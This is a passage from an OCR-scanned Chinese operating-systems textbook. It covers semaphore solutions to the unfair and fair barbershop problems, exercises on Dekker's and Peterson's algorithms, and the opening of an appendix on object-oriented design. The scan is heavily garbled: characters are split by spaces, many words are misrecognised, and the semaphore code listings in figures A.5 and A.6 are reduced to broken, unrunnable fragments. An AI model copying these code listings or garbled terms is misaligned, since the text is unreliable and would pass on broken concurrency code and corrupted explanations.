程 能 通过 semWait (notFull_a), 直到 B 中 有 一 个 线程 执行 semsignal (notFull_A) 
发 出 信号 交换 已 完成 。 类 似 的 理由 可 用 于 B 中 的 线程 。 这 样 ， 这 个 条 件 满 足 了 。 
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2) 一 旦 两 个 线程 进入 它们 的 临界 区 ,它们 交换 消息 不 会 受到 任何 其 他 线程 的 干涉 。A 中 的 
其 他 线程 直到 B 中 的 线程 完成 消息 交换 才能 进入 临界 区 。B 中 的 其 他 线程 直到 A 中 的 线 
程 完成 消息 交换 才能 进入 临界 区 。 这 样 ， 这 个 条 件 满足 了 。 

3) 一 个 线程 离开 临界 区 后 ， 同 一 组 没有 线程 能 够 立即 进入 并 毁 掉 存在 的 消息 。 这 个 条 件 满 
足 了 因为 每 一 个 方向 用 的 是 一 个 插 权 的 缓冲 区 。 一 旦 A 中 的 一 个 线程 执行 semwait 
(notFull_A) 进 入 临界 区 ，A 中 没有 其 他 线程 能 更 新 buf_a 直到 B 中 相关 线程 获取 了 
buf_a 的 值 并 发 出 信号 semsignal (notFull A)。 

经 验 教 训 : 有 必要 回顾 一 下 著名 问题 的 解决 方法 , 因为 将 来 一 个 正确 的 解决 问题 的 办 法 可 能 

源 于 一 个 已 知 问题 的 解决 办 法 。 


A3 理发 店 问题 


考虑 另 一 个 使 用 信号 量 实现 并 发 的 例子 , 简单 的 理发 店 问 题 6。 这 个 例子 是 有 启发 意义 的 因 
为 当时 试 着 提供 讲究 裁剪 的 理发 店 资源 时 所 遇 到 的 问题 和 一 个 实际 操作 系统 所 过 到 的 问题 类 似 。 

理发 店 里 有 三 把 椅子 , 三 位 理发 师 , 一 个 等 待 区 可 供 四 位 顾客 在 沙发 上 等 待 ,其 他 的 顾客 有 
站 的 空间 ( 见 图 A.4 )。 消 防 规范 要 求 理 发 店 中 的 顾客 的 总 数目 不 超过 20 人 。 假 设 理发 店 最 终 接 
待 50 位 顾客 。 

如 果 理 发 店 里 人 已 经 满 了 ， 顾客 就 不 会 进来 。 一 旦 
进来 ,顾客 首先 会 选择 坐 在 沙发 上 , 或 是 在 沙发 也 坐 满 
了 的 情况 下 站 着 。 当 理发 师 空闲 时 ， 向 坐 在 沙发 上 时 间 
最 长 的 顾客 提供 服务 ， 如 果 有 站 着 的 顾客 ,来店 里 时 间 
最 长 的 顾客 坐 到 沙发 上 。 当 顾客 理 完 发 ,任何 一 位 理发 
师 可 以 收 钱 , 但 是 因为 只 有 一 个 收 款 机 ,一 次 只 能 接受 
一 位 顾客 的 付款 。 由 理发 师 安排 理发 、 收 款 、 在 椅子 上 
休息 等 待 顾客 的 时 间 。 图 A.4 理发 店 


A.3.1 不 公平 的 理发 店 问题 
图 A.5 展示 了 使 用 信号 量 的 一 个 实现 ; 为 节省 空间 , 三 个 过 程 并 行 排列 。 假 设 信号 量 队列 处 
理 采 用 先进 先 出 的 策略 。 
程序 的 主体 激活 了 50 个 顾客 、3 个 理发 师 、1 个 收银 员 进 程 。 考 虑 目的 并 安置 各 种 同步 的 
操作 : 
@ 理发 店 和 沙发 的 容量 :理发 店 和 沙发 的 容量 分 别 由 信号 量 max_capacity 和 sofa 管理 。 
每 次 一 位 顾客 要 进入 理发 店 时 , 信号 量 max_capacity M1; 每 次 一 位 顾客 离开 理发 店 
时 ,信号 量 max_capacity 加 1。 如 果 一 位 顾客 发 现 理 发 店 已 满 , 则 顾客 进程 被 semwait 
函数 阻塞 在 max_capacity。 类 似 地 ，semwait 和 semsignal 操作 围绕 着 坐 在 沙发 
上 和 从 沙发 上 起 来 的 活动 。 
@ 理发 师 椅子 容量 : 有 三 把 椅子 ,必须 注意 要 适当 地 使 用 。 信 号 量 barber_chaiz 保证 一 
次 不 会 多 于 三 位 顾客 企图 获得 服务 , 尽力 避免 一 位 顾客 坐 在 另 一 顾客 腿 上 的 不 庄重 的 情况 发 
AE, 一 位 顾客 等 到 至 少 有 一 把 椅子 是 空闲 的 [semwait (barber_chair)] 才 会 起 身 离开 沙 
发 ， 当 一 位 顾客 离开 理发 师 椅子 时 理发 师 就 发 出 信号 [semsignal (barber_chaiz)]。 
获取 理发 师 的 棒子 的 公平 性 由 信号 量 队列 的 组 织 来 保证 : 第 一 位 被 阻塞 的 顾客 第 一 个 允 





© ”我 非常 感谢 位 于 Chico 的 加 州 大 学 的 Ralph Hilzer 教授 提供 这 些 问 题 的 解决 方案 。 
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许 使 用 可 用 的 椅子 。 注 意 ,在 顾客 进程 里 ,如 果 semWait (barber chair) # semSignal 
(sofa) 之 后 发 生 ， 每 一 位 顾客 只 会 暂时 坐 在 沙发 上 ， 然 后 排队 等 待 理发 师 的 棒子 ， 这 
样 会 造成 拥塞 ， 理 发 师 那 儿 只 有 很 少 的 活动 空间 。 

确保 顾客 在 理发 师 的 椅子 上 : 信和 号 量 cust_ready 给 休 眼 的 理发 师 提供 唤醒 信号 ， 表明 
有 顾客 坐 在 椅子 上 了 。 如 果 没 有 这 个 信号 量 ， 理 发 师 永远 不 会 休眠 ， 当 顾客 离开 椅子 时 ， 
理发 师 仍 在 理发 ， 如 果 没 有 新 顾客 获取 座位 ， 理 发 师 就 会 前 空气。 

保持 顾客 在 理发 师 的 棒子 上 : 一 旦 就 座 ， 顾 客 就 坐 在 椅子 上 直到 理发 师 使 用 信号 量 
finished 发 出 理发 已 完成 的 信号 。 

限制 一 位 顾客 一 把 椅子 : 信号 量 barber_chair 限制 三 位 顾客 坐 在 三 把 椅子 上 。 然 而 ， 
barber chair 自己 不 能 成 功 实现 这 一 点 。 如 果 一 位 顾客 在 理发 师 执行 semsignal 
(finished) 之 后 不 能 立即 获得 处 理 器 〈 即 他 还 处 于 睡眠 状态 或 停 下 来 与 邻居 聊天 )， 当 
下 一 位 顾客 要 向 前 入 座 时 ， 该 顾客 还 在 椅子 上 。 信 和 号 量 leave b chair 就 是 要 纠正 这 
个 问题 ， 约 定 直 到 逗留 的 顾客 宣布 他 已 经 离开 椅子 理发 师 才 能 邀请 新 顾客 人 容 。 在 本 章 
末尾 的 习题 里 ， 即 便 是 这 种 防范 措施 也 不 能 阻止 一 些 顾客 重要 落座 。 

付款 和 收 款 : 很 自然 地 ， 在 处 理 钱 的 问题 上 大 家 都 会 很 仔细 。 收 银 员 要 确保 每 一 位 顾客 
在 离开 理发 店 之 前 已 经 付费 , 顾客 要 确认 付款 已 收 到 ( 收据 )。 面对面 的 付款 能 有 效 地 实 
现 这 一 点 。 每 一 位 顾客 从 椅子 上 起 身 、 付 款 ， 告 诉 收 银 员 已 经 付款 了 [semsignal 
(payment)] ， 然 后 等 待 收据 [semWait (receipt)]。 收 银 员 重复 地 处 理 付 款 任务 : 

等 待 付款 信和 号、 接受 付款 、 发 出 付款 已 收 到 信号。 这 里 需要 避免 一 些 编程 错误 。 如 果 
[semSignal (payment) ] 发 生 在 付款 活动 之 前 ， 顾 客 发 出 信号 后 就 会 被 中 斯 ; 这 将 导 
致 即便 没有 人 付款 ， 空 闲 的 收银 员 也 会 接受 付款 。 一 个 更 为 严重 的 错误 将 颠倒 队列 中 
semSignal (payment) 和 semWait (receipt) MiB. 这 将 导致 死 锁 , 因为 所 有 的 顾 
客 和 收银 员 阻 塞 在 各 自 的 semWait 操作 里 。 

调整 理发 师 和 收银 员 的 功能 : 为 了 省 钱 ， 该 理发 店 没有 单独 雇用 收银 员 。 每 位 理发 师 当 
他 不 理发 的 时 候 要 扮演 收银 员 的 角色 。 信 和 号 量 coord 确保 理发 师 一 次 只 执行 一 个 任务 。 


* program barbershop] */ 
rd = 3; 
e cust_ready = 0, finished = 0, leave_b chair = 0, payment= 0, receipt = 0; 


stomer () void barber() void cashier() 
{ 


{ 
Nae pogas ity); x while (true 
{ { semWait (payment); 


semSignal (receipt); 


B 
prea ye ave_b_ohair); } 
semg 


l(barber_chair); 


5 ); 
semSignal (max_ capacity) 


void main() 


parbegin (customer, .. . t Bp » o + OUS r, barber, r, barber, cashier); 





AS 不 公平 的 理发 店 


表 A.1 概括 了 程序 中 所 使 用 的 每 一 个 信号 量 。 
通过 把 付款 功能 合并 到 理发 师 进 程 中 , 可 以 把 收银 员 进程 取消 。 每 一 位 理发 师 按 顺序 理发 收 
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款 。 然 而 ,由 于 只 有 一 台 收 款 机 ， 有 必要 限制 一 次 只 有 一 位 理发 师 能 够 收 款 。 可 以 通过 把 这 段 代 
码 看 做 临界 区 ， 并 通过 信号 量 管理 。 


表 A.1 图 A.5 中 信号 量 的 作用 

信 号 量 ”等 待 操作 信号 操作 
max_capacity 顾客 等 待 空间 以 进入 理发 店 离 去 顾客 发 出 顾客 等 待 进入 的 信号 
sofa 顾客 等 待 沙发 上 的 座位 显 客 离开 沙发 发 出 顾客 等 待 沙发 的 信号 
barber_chair 顾客 等 待 空 理发 椅 理发 师 的 座 阐 空闲 时 ， 理 发 师 发 出 信号 
cust_ready 理发 师 等 待 ， 直 到 顾客 坐 在 棒子 上 顾客 向 理发 师 发 出 顾客 已 坐 窒 椅子 上 的 信号 
finished 顾客 等 待 ， 直 到 理发 完成 理 完 顾客 的 头发 后 ， 理 发 师 发 出 信号 
leave_b_chair 理发 师 等 待 ， 直 到 顾客 离开 椅子 顾客 离开 椅子 时 ， 顾客 疝 理发 师 发 信号 
payment 收 铺 员 等 待 顾客 付款 顾客 向 收银 员 发 出 已 付款 信号 
receipt 顾客 等 待 支付 收据 收银 员 发 出 支付 已 接受 信号 
coord 等 待 理发 师资 源 空 闲 ， 以 执行 理发 或 收银 功能 。 发 出 理发 师资 源 空闲 信号 

A.3.2 ”公平 的 理发 店 问题 


A.5 是 一 个 很 好 的 结果 , 但 仍 有 问题 。 其 中 一 个 问题 将 在 本 节 下 面部 分 解决 ; 其 他 的 留 给 
读者 作为 练习 题 ( 参见 习题 A.6 )。 

图 A.5 有 个 时 间 问 题 会 导致 顾客 的 不 公平 对 待 。 假 设 三 位 顾客 同时 在 理发 师 椅子 上 就 座 , 这 
种 情况 下 ， 顾 客 就 会 被 阻塞 在 semWait (finished) ， 由 于 队列 组 织 会 被 按 顺 序 释 放 到 理发 师 
的 椅子 上 。 然 而 , 如 果 某 位 理发 师 速度 很 快 或 某 位 顾客 头发 很 称 朴 会 怎样 ? 让 高 速 理发 师 的 顾客 
起 来 会 导致 一 位 顾客 被 草率 地 楼 出 座位 , 理 了 一 半 头 发 强行 收取 全 部 费用 , 而 另 一 位 顾客 即便 理 
完 发 也 被 限制 在 椅子 上 。 

这 个 问题 可 以 通过 如 图 A.6 中 所 示 的 更 多 的 信号 量 来 解决 。 每 一 位 顾客 指定 了 唯一 一 个 顾客 
号 码 ; 这 就 相当 于 每 位 顾客 进 理发 店 时 拿 了 一 个 号 码 。 信 和 号 量 mutexl 保护 访问 全 局 变量 count 
以 便 每 一 位 顾客 收 到 唯一 号 码 。 信 号 量 finished 被 重新 定义 为 50 个 信号 量 的 数组 。 一 旦 顾客 
在 理发 师 椅子 上 入座， 便 执行 semWait (finished[custnr] ) 等 待 自 己 唯一 的 信号 量 ; 理发 
师 执 行 semsignal (finished [b_cust]) 释 放 正 确 的 顾客 。 


tex2 
= 0, leave | b chair 
tak touts finds hed [50] = {0}; 
int count 


= 0, payment = 0, receipt = 0; 


void customer() void barber() void cashier() 
{ 


while (true) 
{ 


int b 
while | an oe 
4 


semait( payment); 
senWait( Sore 
accept _pay 
pe a 5i y AA 

pr et 


semiait(cuet ready); 
senmait (mutex2); 
dequevel(b_ cust); 
sems ignal (mutex?) ; 
senttait (coord) ; 


semsignal(barber_ chair); 


semsignal (max capacity) 
} 


void main() 
{ count :+ 


parbegin : stomer, . . » 7 . . customer, barber, barber, barber, cashier); 





图 A.6 公平 的 理发 店 


HRA FH KR ÈM 515 





还 需要 说 明 的 是 ， 理 发 师 是 怎样 知道 顾客 号 码 的 。 顾 客 通过 信号 量 cust ready 预先 发 信 
号 给 理发 师 把 号 码 放 在 队列 enqueue1 中 。 当 理发 师 准 备 理发 ,dequeuel (b_cust) 从 queuel 
中 删除 最 项 上 的 顾客 号 码 ， 把 它 放 在 理发 师 局 部 变量 b_cust 中 。 


A.4 习题 


A.l 证 明 Dekker 算法 的 正确 性 。 
a) 证 明 该 算法 能 够 确保 互 斥 执行 。 提 示 : 说 明 Pi 进入 临界 区 时 ， 下 面 表达 式 是 对 的 : 
flag[i] and (not flag[1-1i]) 
b) 证 明 要 访问 临界 区 的 进程 不 会 无 限 等 待 。 提 示 : 考虑 以 下 情况 : (1) 单一 线程 要 进入 临界 区 ; (2) 
两 个 线程 都 要 进 人 临界 区 ， 且 (2a) turn = 0 和 flag[0]= false, A (2b)turn = 0 和 
flag[0]= true, 
A.2 考虑 通过 改变 执行 语句 为 任意 数量 的 线程 所 写 的 Dekker 算法 ， 当 从 
turn = 1 - i; /* 例 如 ，P0 设置 turn 为 1,P1l 设置 turn 为 0 */ 
到 
turn = ( turn + 1)%n /*n= 进程 的 数量 */ 
离开 临界 区 ， 评价 当 并 发 执行 的 进程 多 于 两 个 时 的 Dekker 算法 。 
A.3 证 明 下 列 软 件 互 斥 方法 没有 依赖 基本 的 内 存 访问 级 别 的 互 斥 : 
a) 面包 店 算法 。 
b ) Peterson 算法 。 
A.4 回答 下 列 和 公平 理发 店 相关 的 问题 ( 见 图 A.6 ): 
a) 这 段 代码 需要 给 一 位 顾客 理发 的 理发 师 向 顾客 收取 付款 吗 ? 
b) 理发 师 总 是 使 用 同一 把 椅子 吗 ? 
A.5 A.6 的 公平 理发 店 还 有 许多 问题 。 修 改 程序 纠正 下 列 问题 。 
a) 当 两 位 或 更 多 顾客 在 等 待 付款 时 ， 收 银 员 可 能 接受 一 位 顾客 的 付款 ， 而 释放 另 一 位 。 幸 运 的 是 ， 
一 旦 一 位 顾客 提出 付款 ,没有 办 法 收回 ， 最 终 收 款 机 里 钱 的 数目 是 对 的 。 不 过 ， 还 是 要 实现 顾客 
的 付款 被 收 到 就 释放 正确 的 顾客 。 
b ) 信号 量 leave_b_chair 被 认为 可 以 阻止 多 个 人 同时 使 用 单个 理发 师 的 椅子 。 不幸 的 是 , 不 是 所 
有 的 情况 该 信号 量 都 能 达到 这 一 功能 。 例 如 ， 假定 所 有 三 位 理发 师 完 成 理发 阻塞 在 sem 
Wait(leave_b chair)。 两 位 顾客 在 leave barber chair 之 前 进 和 人 中断 状态 。 第 三 位 顾 
客 离开 椅子 执行 semsignal(leave b chair)。 哪 位 理发 师 会 被 释放 ? 因为 队列 
leave_b chair 是 先进 先 出 的 ， 所 以 第 一 位 被 阻塞 的 理发 师 会 被 释放 。 理 发 师 是 在 给 发 信号 的 
那 位 顾客 理发 吗 ? 可 能 是 ， 也 可 能 不 是 。 如 果 不 是 ， 新 来 的 顾客 就 会 和 正 要 起 身 离开 的 顾客 坐 在 
一 起 。 
c) 程序 要 求 即 便 理 发 师 的 棒子 是 空 的 顾客 也 蔓 先 坐 到 沙发 上 去 。 必 须 承 认 ， 这 确实 是 一 个 小 问题 ， 
解决 这 个 问题 会 使 得 本 已 杂乱 的 代码 更 加 凌乱 。 不 管 怎样 ， 试 着 做 一 下 。 


附录 B 面向 对 象 设 计 


Windows 和 其 他 一 些 同 时 代 的 操作 系统 很 强 地 依赖 于 面向 对 象 设计 原则 。 本 附录 对 面向 对 象 
设计 的 主要 概念 进行 了 简要 概述 。 


B.1 动机 


面向 对 象 概念 在 计算 机 编程 领域 已 经 很 流行 , 期 待 达到 可 交换 性 、 可 重用 性 、 易 修改 和 各 软 
件 部 件 易 互 连 的 目的 。 最 近 , 数据 库 设 计 者 开始 青睐 面向 对 象 设计 的 好 处 , 面向 对 象 的 数据 库 管 
理 系统 ( OODBMS ) 开始 出 现 。 操 作 系统 设计 者 也 已 经 认识 到 面向 对 象 方法 的 好 处 。 

面向 对 象 编程 和 面向 对 象 数 据 库 管理 系统 实际 上 是 不 同 的 ,但 是 它们 使 用 了 一 个 共同 的 重要 
概念 : 软件 或 数据 能 够 能 被 “封装 ”( containerized )。 所 有 东西 都 放 进 了 人 盒子。 盒子 还 可 以 封装 
Hat. 在 最 简单 的 传统 程序 中 ,一 个 程序 步骤 等 同 于 一 条 指令 ; 在 面向 对 象 编程 里 ,每 一 步骤 
就 可 能 会 是 一 盒子 的 指令 。 类似 地 , 在 面向 对 象 的 数据 库 里 , 一 个 变量 不 是 等 同 于 一 个 单独 的 数 
据 元 素 ， 而 是 等 同 于 一 盒子 的 数据 。 

表 B.1 介绍 了 一 些 面向 对 象 设 计 中 使 用 的 关键 术语 。 


表 B.1 面向 对 象 的 关键 术语 


术 语 定 义 

属性 包含 于 对 象 内 的 数据 变量 

包含 两 个 对 象 实例 之 间 的 关系 、 其 中 包含 者 含有 一 个 指向 被 包含 者 的 指针 

封装 对 象 实 例 的 属性 和 服务 与 外 部 环境 的 隔离 。 服 务 只 能 通过 名 字 调 用 ,属性 只 能 通过 服务 
访问 

继承 两 个 对 象 类 之 间 的 关系 ， 子 类 可 以 歼 得 父 类 的 属性 和 服务 

gn 一 个 和 对 象 类 紧密 相关 的 描述 。 接 口 包含 方法 声明 ( 没有 实现 ) 和 常量 值 。 接 口 不 能 实 
例 化 为 一 个 对 象 

消息 对 象 交互 的 方式 

方法 过 程 ， 是 对 象 的 组 成 部 分 ， 可 在 对 象 外 部 激活 其 执行 某 一 功能 

WR 现实 世界 实体 的 抽象 

对 象 类 共享 相同 名 字 、 属 性 集 、 服 务 的 对 象 的 有 名 集合 

对 象 实例 一 个 赋予 属性 值 的 对 象 类 的 具体 成 员 

多 态 性 指使 用 相同 的 服务 名 ， 对 外 呈现 相同 的 接口 但 却 代 表 不 同类 型 实体 的 多 个 对 象 存在 

服务 在 某 一 对 象 上 执行 某 一 操作 的 函数 








B.2 面向 对 象 的 概念 


面向 对 象 设计 的 核心 概念 是 对 象 。 对 象 是 一 个 独特 的 软件 单元 , 包含 相关 的 变量 (数据 ) 和 
方法 (TH) 的 集合 。 一 般 说 来 , 这些 变 量 和 方法 在 对 象 外 面 不 是 直接 可 见 的 。 不过， 存在 恰当 
的 接口 以 允许 其 他 软件 访问 这 些 数据 和 过 程 。 

一 个 对 象 代表 了 某 些 事务 , 可 能 是 一 个 物理 实体 、 一 个 概念 、 一 个 软件 模型 或 是 某 些 动态 模 
型 ， 例 如 一 个 TCP 连接 。 对 象 里 的 变量 值 表示 对 象 所 代表 的 事物 的 已 知 信息 。 方 法 包含 一 些 过 
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程 ， 这 些 过 程 在 执行 时 会 影响 对 象 中 的 值 ， 也 可 能 会 影响 对 象 所 代表 的 事物 。 
图 B.1 和 图 B.2 举例 说 明了 面向 对 象 的 关键 概念 。 


B.2.1 ”对象 结构 


通常 , 对象 中 包含 的 数据 和 过 程 相 应 地 称 做 变量 和 方法 。 对 象 中 的 变量 表示 对 象 “知道 ”的 
事情 ， 对 象 中 的 方法 表示 对 象 能 做 的 事情 。 

一 个 对 象 中 的 变量 ， 也 称 做 属性 ,是 简单 的 标量 或 是 表格 。 每 个 变量 都 有 一 个 类 型 ， 可 能 是 
可 用 值 的 集合 ， 不 是 常量 就 是 变量 ( 习惯 上 变量 也 用 来 表示 常量 )。 可 根据 某 些 用 户 某 类 用 户 、 
或 是 应 用 情形 来 设 定 变量 的 访问 约束 。 

对 象 中 的 方法 是 可 以 从 外 部 触发 执行 某 些 功能 的 过 程 。 方 法 可 以 改变 对 象 的 状态 , 更 新 一 些 
变量 ， 或 是 作用 于 对 象 可 以 访问 的 外 部 资源 。 

对 象 之 间 通 过 消息 交互 。 消 息 包含 发 送 消息 的 对 象 名 、 接 收 消息 的 对 象 名 、 接 收 消息 的 对 象 
的 方法 名 和 使 方法 执行 所 需 的 任何 参数 。 消息 只 能 用 来 调用 对 象 内 部 的 方法 。 访 问 对 象 内 部 数据 
的 唯一 方式 是 通过 对 象 的 方法 。 这 样 ， 方 法 可 引起 一 个 动作 的 执行 或 是 使 得 对 象 变量 可 以 访问 。 
对 于 本 地 对 象 ， 向 一 个 对 象 传递 消息 就 像 调 用 一 个 对 象 方法 一 样 。 当 对 象 是 分 布 的 , 传递 消息 才 
真正 名 副 其 实 。 


称 为 属性 )， 


一 个 对 象 知道 某 些 东西 ( 
可 做 某 些 事情 称 为 服务 ) 





图 B.1 WR 


对 象 接口 是 对 象 所 支持 的 公共 方法 的 集合 。 接口 没有 实现 任何 东西 ; 不 同类 的 对 象 可 以 有 相 
同 接口 的 不 同 实现 。 | 
对 象 仅仅 通过 消息 与 外 界 交互 这 一 性 质 称 做 封装 。 对象 的 方法 和 变量 是 封装 的 , 且 仅 可 通过 
基于 消息 的 通信 方式 访问 。 封 装 有 两 个 优点 : 
1+) 保护 对 象 变量 不 被 其 他 对 象 破坏 。 包 括 对 非法 访问 的 保护 和 并 发 访问 所 引起 的 如 死 锁 和 
值 的 不 一 致 性 的 问题 。 
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2) 隐藏 了 对 象 的 内 部 结构 ， 使 得 对 象 交互 相对 简单 并 可 标准 化 。 此 外 ， 如 果 修 改 了 对 象 的 
内 部 结构 或 过 程 而 没有 改变 对 象 的 外 部 功能 ， 其 他 对 象 不 受 影 响 。 





图 B.2 ”对象 概 念 


B.2.2 对象 类 


实际 上 , 许多 对 象 典 型 地 代表 了 同一 类 型 的 事物 。 例 如 ， 如果 一 个 对 象 代 表 一 个 进程 ,那么 
系统 中 每 一 个 进程 都 会 有 一 个 对 象 对 应 。 很 明显 , 每 一 个 这 样 的 对 象 需要 自己 的 变量 集合 。 然 而， 
如 果 对 象 的 方法 是 可 重 人 的 过 程 ， 所 有 类 似 的 对 象 可 以 共享 相同 的 方法 。 ME, 对 每 一 个 新 的 类 
似 的 对 象 的 方法 和 变量 都 重新 定义 是 没有 效率 的 。 

这 些 难题 的 解决 方法 是 将 对 象 类 和 对 象 实例 区 分 开 来 。 对 象 类 (object class) 是 定义 可 以 包 
含 在 一 个 特定 对 象 类 型 里 的 方法 和 变量 的 模板 。 对 象 实例 (object instance) 是 实际 对 象 , 包含 了 定 
义 它 的 类 的 特征 。 对 象 含 有 类 对 象 里 所 定义 的 变量 的 值 。 实 例 化 (instantiation) 是 为 对 象 类 创建 一 
个 新 的 对 象 实例 的 过 程 。 


继承 

对 象 类 的 概念 是 很 有 用 的 , 因为 对 象 类 可 以 实现 用 最 小 的 代价 创建 许多 新 的 对 象 实例 。 使 用 
继承 机 制 使 得 这 一 概念 更 加 有 用 [TAIV96]。 

继承 可 以 在 已 有 类 上 定义 新 的 对 象 类 。 称 做 子 类 (subclass 或 child class) 的 新 (更 低级 别 
的 ) 类 , 将 自动 包含 称 做 父 类 (superclass 或 parent class) 的 原始 (更 高 级 别 的 ) 类 所 定义 的 方 
法 和 变量 。 子 类 在 许多 方面 不 同 于 父 类 ; 

1) 子 类 可 以 包含 父 类 中 所 没有 的 方法 和 变量 。 
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2) 子 类 可 以 通过 重新 定义 来 重 载 父 类 中 任何 相同 名 字 的 方法 或 变量 。 
提供 了 一 种 简单 有 效 的 方法 来 处 理 特 例 。 

3 ) 子 类 可 以 在 某 些 方面 对 从 父 类 继承 的 方法 或 变量 进行 限制 。 

B.3 是 基于 [KORS90] 中 的 某 个 图 ， 举 例 说 明了 继承 的 概念 。 

继承 机 制 是 递归 的 ， 允 许 一 个 子 类 成 为 其 子 类 的 父 类 。 这 样 ， 建 立 了 
一 种 继承 层次 ( inheritance hierarchy )。 概 念 上 可 以 认为 继承 层次 定义 了 针 
对 方法 和 变量 的 一 种 搜索 技术 。 当 一 个 对 象 收 到 一 个 消息 去 执行 在 其 类 中 
没有 定义 的 方法 时 , 对 象 将 沿 继承 层次 向 上 搜索 直至 找到 该 方法 。 类似 地 ， 
如 果 一 个 方法 的 执行 导致 了 访问 没有 在 该 类 中 定义 的 变量 ， 对 象 就 会 沿 着 
继承 层次 向 上 搜索 变量 名 。 


多 态 性 

多 态 性 是 一 个 很 有 趣 且 很 有 用 的 特性 ， 使 得 把 不 同 实现 隐藏 于 共同 接 B3 MR 
口 之 后 成 为 可 能 。 两 个 多 态 的 对 象 使 用 相同 的 方法 名 字 ， 对 其 他 对 象 呈 现 相同 的 接口 。 例 如 ,对 
不 同 的 输出 设备 会 有 许多 打印 对 象 ， 如 printDotmatrix, printLaser, printScreen 等 ; 或 是 不 同类 
型 的 文件 ， 如 printText、printDrawing、printCompound。 如 果 每 一 个 对 和 象 包含 一 个 叫做 print 代 
的 方法 ， 那么 通过 向 合适 的 对 象 发 送 print 消息 任何 文件 都 可 以 被 打印 ， 而 不 必 关 心 实 际 上 方法 
是 如 何 执行 的 。 通常 情况 下 ,多 态 性 可 以 用 来 实现 同一 个 父 类 的 多 个 子 类 的 相同 方法 , 每 个 方法 
都 有 一 个 不 同 的 具体 实现 。 

将 多 态 性 与 通常 的 标准 组 件 编程 技术 进行 比较 是 有 益 的 。 自 上 而 下 的 标准 组 件 设 计 的 目的 是 
要 使 用 高 层 模块 的 固定 接口 实现 低层 模块 的 通用 效用 。 可 以 实现 一 个 较 低 层 的 模块 被 许多 不 同 的 
高 层 的 模块 使 用 。 如 果 改 变 了 低层 模块 的 内 部 而 没有 改变 其 接口 , 那么 使 用 低层 模块 的 高 层 模块 
不 会 受 影响 。 相 比 之 下 , 多 态 性 实现 了 高 级 别 的 对 象 通过 相同 的 消息 格式 使 用 许多 低级 别 对 象 完 
成 类 似 的 功能 。 通 过 多 态 性 ， 在 已 存在 的 对 象 上 做 最 小 的 改变 就 可 以 增加 新 的 低级 别 对 象 。 


接口 

接口 使 得 子 类 对 象 能 够 使 用 父 类 的 功能 。 有 时 需要 定义 一 个 具有 多 个 父 类 功能 的 子 类 。 这 可 
以 通过 允许 一 个 子 类 继承 多 个 父 类 来 实现 。C++ 是 一 种 允许 多 重 继承 的 语言 。 然 而 , 为 简单 起 见 ， 
大 多 数 现代 面向 对 象 编程 语言 , 如 Java、C# 和 Visual Basic .NET, 限制 一 个 类 只 能 继承 一 个 父 类 。 
相反 ,接口 为 人 所 知 的 特征 是 可 以 实现 在 借用 一 个 类 中 的 功能 的 同时 从 另外 一 个 完全 不 同 的 类 中 
借用 其 他 功能 。 

不 幸 的 是 , 接口 这 个 术语 更 多 地 用 来 描述 对 象 的 通用 功能 和 具体 函数 意义 。 这 里 所 讨论 的 接 
口 ， 具 体 是 指 为 某 个 功能 实现 的 编程 应 用 接口 (API )。API 没有 定义 任何 实现 。 接 口 定 义 的 语法 
通常 和 类 定义 看 上 去 很 像 , 除了 没有 定义 方法 的 代码 , 仅仅 有 方法 名 、 传 递 的 参数 、 返 回 值 的 类 
型 。 接口 可 由 一 个 类 实现 和 继承 实现 一 样 。 如 果 一 个 类 实现 了 一 个 接口 , 类 中 必须 定义 接口 中 的 
属性 和 方法 。 只 要 每 一 个 方法 的 名 字 、 参 数 和 返回 类 型 与 接口 中 的 此 方法 的 定义 相同 , 方法 的 实 
现代 码 可 以 是 任何 样式 的 。 


B.2.3 包含 


包含 其 他 对 象 的 对 象 实例 称 做 复合 对 象 (composite object )。 包 含 关 系 可 以 通过 在 一 个 对 象 
中 包含 指向 另 一 对 象 的 指针 来 实现 。 复 合 对 象 的 优点 是 可 以 表示 复杂 的 结构 。 例 如 , 包含 在 复杂 
对 象 里 的 对 象 本 身 也 可 以 是 个 复杂 对 象 。 

典型 地 ,复杂 对 象 建立 的 结构 局 限于 树 型 拓扑 结构 ; 也 就 是 说 , 不 允许 循环 引用 , 即 每 个 “ 子 ” 
对 象 实例 只 能 有 一 个 “ 父 ” 对 象 实例 。 
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清楚 对 象 类 的 继承 层次 和 对 象 实例 的 包含 层次 之 间 的 区 别 是 很 重要 的 。 二 者 是 不 相关 的 。 使 
用 继承 就 是 以 最 小 的 代价 定义 许多 不 同类 型 的 对 象 。 使 用 包含 则 可 建立 复杂 的 数据 结构 。 


B.3 面向 对 象 设计 的 优点 


[CAST92] 列 举 了 以 下 面向 对 象 设计 的 优点 : 

o 更 好 地 组 织 内 在 复杂 性 : 通过 使 用 继承 ， 可 以 有 效 定义 相关 概念 、 资 源 和 其 他 对 象 。 通 
过 使 用 包含 ， 可 以 构造 反映 下 面 任务 的 任意 数据 结构 。 面 向 对 象 编程 语言 和 数据 结构 使 
得 设计 者 能 够 以 反映 设计 者 所 理解 的 方式 来 描述 操作 系统 的 资源 和 功能 。 

o 通过 复 用 减少 开发 开销 : 复 用 别人 编写 、 测 试 、 维 护 的 对 象 类 能 够 缩短 开发 、 测 试 、 维 
护 时 间 。 

© 系统 更 易 扩 展 和 维护 : 维护 ( 包括 产品 增强 和 修复 ) 通常 情况 下 会 消耗 任何 产品 生命 周 
期 中 大 约 65% 的 花 销 。 面 向 对 象 设计 使 得 这 一 百分比 下 降 。 基 于 对 象 的 软件 的 使 用 可 以 
帮助 减少 软件 不 同 部 分 潜在 的 交互 数量 ， 确 保 改变 一 个 类 的 实现 只 会 对 系统 的 其 余部 分 
造成 很 小 的 影响 。 

这 些 优点 驱使 操作 系统 设计 向 面向 对 象 系统 方向 发 展 。 对 象 使 程序 员 在 不 破坏 系统 完整 性 的 
情况 下 ,定制 操作 系统 以 满足 新 的 需求 。 对 象 也 为 分 布 式 计 算 铺 平 了 道路 。 因 为 对 象 是 通过 消息 
通信 的 , 不 论 消息 通 信 的 双方 是 在 同一 系统 内 或 是 网 络 中 不 同 的 系统 内 都 没有 关系 。 数 据 、 函 数 
和 线程 可 以 根据 需要 动态 地 分 配给 工作 站 和 服务 器 。 从 而 ， 面 向 对 象 的 操作 系统 设计 方法 在 PC 
和 工作 站 操作 系统 中 ， 就 显得 更 加 重要 了 。 


B.4 CORBA 


从 本 书 中 可 以 看 到 , 面向 对 象 的 概念 已 经 被 用 来 设计 并 实现 操作 系统 内 核 , 由 此 带 来 了 灵活 
